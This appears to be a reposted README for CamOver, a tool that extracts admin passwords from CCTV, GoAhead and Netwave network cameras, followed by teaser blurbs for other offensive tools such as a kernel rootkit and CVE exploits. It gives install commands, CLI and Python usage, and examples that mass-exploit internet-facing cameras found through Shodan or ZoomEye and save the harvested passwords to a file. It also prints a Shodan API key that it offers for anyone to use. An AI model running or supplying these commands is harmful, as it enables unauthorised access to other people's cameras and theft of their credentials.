CamOver is a camera exploitation tool that allows to disclosure network camera admin password.
Features
CCTV
, GoAhead
and Netwave
.Installation
pip3 install git+https://github.com/EntySec/CamOver
Basic Usage
To use it just type camover
in your terminal.
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN]
[–zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, –help show this help message and exit
-t, –threads Use threads for fastest work.
-o OUTPUT, –output OUTPUT
Output result to file.
-i INPUT, –input INPUT
Input file of addresses.
-a ADDRESS, –address ADDRESS
Single address.
–shodan SHODAN Shodan API key for exploiting devices over Internet.
–zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, –pages PAGES
Number of pages you want to get from ZoomEye.
Examples
Exploiting single camera
Let’s hack my camera just for fun.
camover -a 192.168.99.100
Exploiting cameras from Internet
Let’s try to use Shodan search engine to exploit cameras over Internet, we will use it with -t
for fast exploitation.
camover -t –shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD
) is my PRO API key, you can use this key or your own, be free to use all our resources for free 🙂
Exploiting cameras from input file
Let’s try to use opened database of cameras with -t
for fast exploitation.
camover -t -i cameras.txt -o passwords.txt
NOTE: It will exploit all cameras in cameras.txt
list by their addresses and save all obtained passwords to passwords.txt
.
API Usage
CamOver also has their own Python API that can be invoked by importing CamOver to your code.
from camover import CamOver
Basic functions
There are all CamOver basic functions that can be used to exploit specified camera.
exploit(address)
– Exploit single camera by given address.
Examples
Exploiting single camera
from camover import CamOver
camover = CamOver()
creds = camover.exploit(‘192.168.99.100’)
print(creds)
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…